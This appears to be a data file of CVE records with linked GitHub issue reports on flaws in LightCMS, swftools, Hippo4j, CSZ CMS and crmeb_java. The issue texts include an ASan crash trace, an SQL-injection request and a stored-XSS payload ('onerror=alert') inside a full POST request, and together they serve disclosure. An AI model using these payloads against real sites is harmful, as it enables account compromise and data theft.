[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/eddy8/LightCMS/issues/21" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://igml.top/2021/05/10/lightcms-RCE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/eddy8/LightCMS/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://igml.top/2021/05/10/lightcms-RCE/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lightcms_project:lightcms:1.3.7:*:*:*:*:*:*:*", "matchCriteriaId": "CB7D3D7B-45D1-464D-8470-ACA099B89C04", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "306" ]
306
https://github.com/eddy8/LightCMS/issues/21
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "eddy8", "LightCMS" ]
## Description The `image:make` function in fetchImageFile can trigger phar deserialization. Combined with the deserialization chain of the laravel framework, it can cause remote code execution vulnerabilities. ## Impact Version lightcms latest version (v1.3.7) ## Steps to Reproduce Please see this [link](https://igml.top/2021/05/10/lightcms-RCE/) for details.
RCE vulnerability in lightcms v1.3.7
https://api.github.com/repos/eddy8/LightCMS/issues/21/comments
1
2021-05-09T17:06:14Z
2021-05-11T01:16:55Z
https://github.com/eddy8/LightCMS/issues/21
882,553,313
21
4,873
CVE-2023-27249
2023-03-23T02:15:12.733
swfdump v0.9.2 was discovered to contain a heap buffer overflow in the function swf_GetPlaceObject at swfobject.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://swfdump.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/keepinggg/poc/blob/main/poc_of_swfdump/poc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/keepinggg/poc/tree/main/poc_of_swfdump" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/matthiaskramm/swftools" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/197" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://swfdump.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/keepinggg/poc/blob/main/poc_of_swfdump/poc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/keepinggg/poc/tree/main/poc_of_swfdump" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/matthiaskramm/swftools" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/197" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/197
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# heap-buffer-overflow ## env ubuntu20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1) swfdump - part of swftools 0.9.2 ## sample [poc.zip](https://github.com/keepinggg/poc/blob/main/poc_of_swfdump/poc) ## crash ``` ./swfdump -D poc ==2946990==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000023 at pc 0x7f76f23fca7d bp 0x7fff4af77e40 sp 0x7fff4af775e8 READ of size 11 at 0x603000000023 thread T0 #0 0x7f76f23fca7c in __interceptor_strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354 #1 0x561bf882902a in swf_GetPlaceObject modules/swfobject.c:195 #2 0x561bf881db3a in main /home/ther/fuzzing/swftools-master/src/swfdump.c:1341 #3 0x7f76f205c082 in __libc_start_main ../csu/libc-start.c:308 #4 0x561bf8816ced in _start (/home/ther/fuzzing/swftools-master/src/swfdump+0x23ced) 0x603000000023 is located 0 bytes to the right of 19-byte region [0x603000000010,0x603000000023) allocated by thread T0 here: #0 0x7f76f24a2808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bf888d0ef in rfx_alloc /home/ther/fuzzing/swftools-master/lib/mem.c:30 #2 0x561bf889c4b3 (/home/ther/fuzzing/swftools-master/src/swfdump+0xa94b3) SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354 in __interceptor_strlen Shadow bytes around the buggy address: 0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c067fff8000: fa fa 00 00[03]fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2946990==ABORTING ```
heap-buffer-overflow exists in the function swf_GetPlaceObject in swfobject.c
https://api.github.com/repos/swftools/swftools/issues/197/comments
0
2023-02-26T09:28:41Z
2023-02-26T09:28:41Z
https://github.com/swftools/swftools/issues/197
1,599,986,264
197
4,874
CVE-2023-27094
2023-03-23T17:15:15.817
An issue found in OpenGoofy Hippo4j v.1.4.3 allows attackers to escalate privileges via the ThreadPoolController of the tenant Management module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/opengoofy/hippo4j/issues/1059" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/opengoofy/hippo4j/issues/1059" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opengoofy:hippo4j:1.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "8FDE6062-50F4-4276-8D27-337745FF8AF1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "269" ]
269
https://github.com/opengoofy/hippo4j/issues/1059
[ "Vendor Advisory" ]
github.com
[ "opengoofy", "hippo4j" ]
ThreadPoolController of the tenant Management module module of hippo4j. An unauthorized access vulnerability arises from thread pool deletion DeletePool method to perform the current operation of user authentication, leads to any user can access the DELETE/hippo4j/v1 / cs/thread pool/DELETE interface deleting items within the thread pool Influence version hippo4j 1.4.3 (Nov 06, 2022) Detailed path: \ hippo4j - v1.4.3 \ hippo4j - server \ hippo4j - the console cn \ \ SRC \ main \ Java \ hippo4j \ console \ controller \ ThreadPoolController Java Found in Java deletePool method in ThreadPoolController., locating defects in code
[Bug] Hippo4j monitors unauthorized access vulnerabilities
https://api.github.com/repos/opengoofy/hippo4j/issues/1059/comments
0
2023-02-20T08:55:55Z
2023-09-01T08:28:20Z
https://github.com/opengoofy/hippo4j/issues/1059
1,591,414,085
1,059
4,875
CVE-2020-19786
2023-03-23T20:15:13.777
File upload vulnerability in CSKaza CSZ CMS v.1.2.2 fixed in v1.2.4 allows attacker to execute aritrary commands and code via crafted PHP file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cszcms:csz_cms:1.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "00DCD2B8-2F52-4BF9-8404-06760D8F6647", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/cskaza/cszcms/issues/20
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cskaza", "cszcms" ]
There are any files uploaded in the background of your website, you can upload PHP files, so that if the administrator password is leaked, the file uploaded through here can be directly getshell, take over the web example: ![ๅ›พ็‰‡](https://user-images.githubusercontent.com/44456023/61187664-f06d7d00-a6a6-11e9-8bed-4b1689c31668.png) ![ๅ›พ็‰‡](https://user-images.githubusercontent.com/44456023/61187668-00855c80-a6a7-11e9-8192-50c824424e28.png) I think you should limit the type of file you upload
There is an arbitrary file upload vulnerability
https://api.github.com/repos/cskaza/cszcms/issues/20/comments
2
2019-07-14T18:19:57Z
2019-09-15T07:39:06Z
https://github.com/cskaza/cszcms/issues/20
467,869,529
20
4,876
CVE-2023-1608
2023-03-23T20:15:14.660
A vulnerability was found in Zhong Bang CRMEB Java up to 1.3.4. It has been declared as critical. This vulnerability affects the function getAdminList of the file /api/admin/store/product/list. The manipulation of the argument cateId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-223738 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/crmeb/crmeb_java/issues/11" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223738" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/crmeb/crmeb_java/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223738" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:crmeb:crmeb_java:*:*:*:*:*:*:*:*", "matchCriteriaId": "6B0CB136-8432-4A7D-ADED-3C0E15826090", "versionEndExcluding": null, "versionEndIncluding": "1.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/crmeb/crmeb_java/issues/11
[ "Exploit", "Issue Tracking" ]
github.com
[ "crmeb", "crmeb_java" ]
[Suggested description] sql injection vulnerability exists in crmeb_java <=1.3.4 Failure to check the parameters legally leads to sqli. [Vulnerability Type] SQLi [Vendor of Product] https://github.com/crmeb/crmeb_java [Affected Product Code Base] <=1.3.4 [Affected Component] /api/admin/store/product/list [Attack Type] Remote [Vulnerability details] Get the interface request package GET /api/admin/store/product/list?page=1&limit=20&cateId=&keywords=&type=1&temp=1678870222 HTTP/2 Host: api.java.crmeb.net Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: application/json, text/plain, */* Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://admin.java.crmeb.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://admin.java.crmeb.net/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 The cateId parameter has an injection vulnerability. ![crmeb_java_1](https://user-images.githubusercontent.com/97539349/225280364-ef79b520-4242-4b45-b825-e2ae38b3e2e2.png) There you can see it! [Impact Code execution] true [Cause of vulnerability] com.zbkj.admin.controller.SystemMenuController line 49 The controller calls the getAdminList() method ![crmeb_java_2](https://user-images.githubusercontent.com/97539349/225282042-1e743db4-282e-49ea-8286-a4a74f4fed13.png) follow up to com.zbkj.service.service.impl.StoreProductServiceImpl line 172, Here, the cateId is directly spliced โ€‹โ€‹into the SQL statement, thus causing a SQL injection vulnerability ![crmeb_java_3](https://user-images.githubusercontent.com/97539349/225282791-2e2c4e21-b276-4152-a18b-ef6820bc7112.png) The end,thanks!
There is a sql injection vulnerability in the crmeb_java system /api/admin/store/product/list interface
https://api.github.com/repos/crmeb/crmeb_java/issues/11/comments
0
2023-03-15T10:34:36Z
2023-03-15T10:34:36Z
https://github.com/crmeb/crmeb_java/issues/11
1,625,242,792
11
4,877
CVE-2023-1609
2023-03-23T20:15:14.743
A vulnerability was found in Zhong Bang CRMEB Java up to 1.3.4. It has been rated as problematic. This issue affects the function save of the file /api/admin/store/product/save. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223739.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/crmeb/crmeb_java/issues/12" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223739" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223739" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/crmeb/crmeb_java/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223739" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223739" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:crmeb:crmeb_java:*:*:*:*:*:*:*:*", "matchCriteriaId": "6B0CB136-8432-4A7D-ADED-3C0E15826090", "versionEndExcluding": null, "versionEndIncluding": "1.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/crmeb/crmeb_java/issues/12
[ "Exploit", "Issue Tracking" ]
github.com
[ "crmeb", "crmeb_java" ]
[Suggested description] Store XSS vulnerability exists in crmeb_java <=1.3.4 Failure to filter or validate parameters effectively results in stored XSS. [Vulnerability Type] Stored XSS [Vendor of Product] https://github.com/crmeb/crmeb_java [Affected Product Code Base] <=1.3.4 [Affected Component] /api/admin/store/product/save [Attack Type] Remote [Vulnerability details] payload : ```html <img src=\"1111\" alt=\"2222\" width=\"33\" height=\"33\" onclick=\"alert`333`\" onerror=alert(2)/> ``` Get the request message of the /api/admin/store/product/save interface. ``` POST /api/admin/store/product/save HTTP/2 Host: api.java.crmeb.net Content-Length: 1213 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: application/json, text/plain, */* Content-Type: application/json Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://admin.java.crmeb.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://admin.java.crmeb.net/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 {"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","sliderImages":["https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg"],"videoLink":"","sliderImage":"[\"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg\"]","storeName":"3333","storeInfo":"2132131","keyword":"1111","cateIds":[972,1185],"cateId":"972,1185","unitName":"1111","sort":1,"giveIntegral":1,"ficti":2,"isShow":false,"isBenefit":false,"isNew":false,"isGood":false,"isHot":true,"isBest":false,"tempId":94,"attrValue":[{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","price":0,"cost":0,"otPrice":0,"stock":0,"barCode":"","weight":0,"volume":0,"attrValue":"{\"่ง„ๆ ผ\":\"้ป˜่ฎค\"}"}],"attr":[{"attrName":"่ง„ๆ ผ","attrValues":"้ป˜่ฎค","id":0}],"selectRule":"","isSub":false,"content":"111","specType":false,"id":0,"couponIds":[],"coupons":[],"activity":["้ป˜่ฎค","็ง’ๆ€","็ ไปท","ๆ‹ผๅ›ข"]} ``` The content parameter has a stored XSS vulnerability. Insert the payload and send the request packet. ![crmeb_java_2_1](https://user-images.githubusercontent.com/97539349/225307167-c665a0a3-7343-4ac8-b011-209d5216296c.png) Find the added product and enter the product details page, click the inserted img tag to trigger the vulnerability. ![crmeb_java_2_2](https://user-images.githubusercontent.com/97539349/225307645-3f460298-909f-4d24-a11c-dde76171898c.png) There you can see it! [Impact Code execution] true [Cause of vulnerability] com.zbkj.admin.controller.StoreProductController line 77. The save() method of storeProductService is called on line 77 of this controller ![crmeb_java_2_3](https://user-images.githubusercontent.com/97539349/225310658-2736382a-5480-4e08-87f6-a4c5ccf99510.png) Follow up this method to com.zbkj.service.service.impl.StoreProductServiceImpl. On line 339, save the value of the content parameter in the request packet to the database. Come to the front page. In crmeb_java\admin\src\views\store\creatStore\index.vue, in line 296, use v-html to render the obtained content value. It is known that v-html will treat the obtained content as HTML code to render. ![crmeb_java_2_4](https://user-images.githubusercontent.com/97539349/225312601-7e4dccfe-e691-4b99-85d1-9aca9a2162e5.png) The reason for this vulnerability is that there is no legal security check on user data. The end,thanks!
There is a stored XSS vulnerability in the /api/admin/store/product/save interface of the crmeb_java system
https://api.github.com/repos/crmeb/crmeb_java/issues/12/comments
1
2023-03-15T12:49:41Z
2025-04-08T03:04:37Z
https://github.com/crmeb/crmeb_java/issues/12
1,625,465,846
12
4,878
CVE-2023-1610
2023-03-23T20:15:14.850
A vulnerability, which was classified as critical, has been found in Rebuild up to 3.2.3. Affected by this issue is some unknown functionality of the file /project/tasks/list. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-223742 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/getrebuild/rebuild/issues/597" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223742" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223742" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/getrebuild/rebuild/issues/597" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.223742" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.223742" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*", "matchCriteriaId": "3055AC72-F415-4504-952E-1E891C67D61C", "versionEndExcluding": null, "versionEndIncluding": "3.2.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/getrebuild/rebuild/issues/597
[ "Exploit", "Issue Tracking" ]
github.com
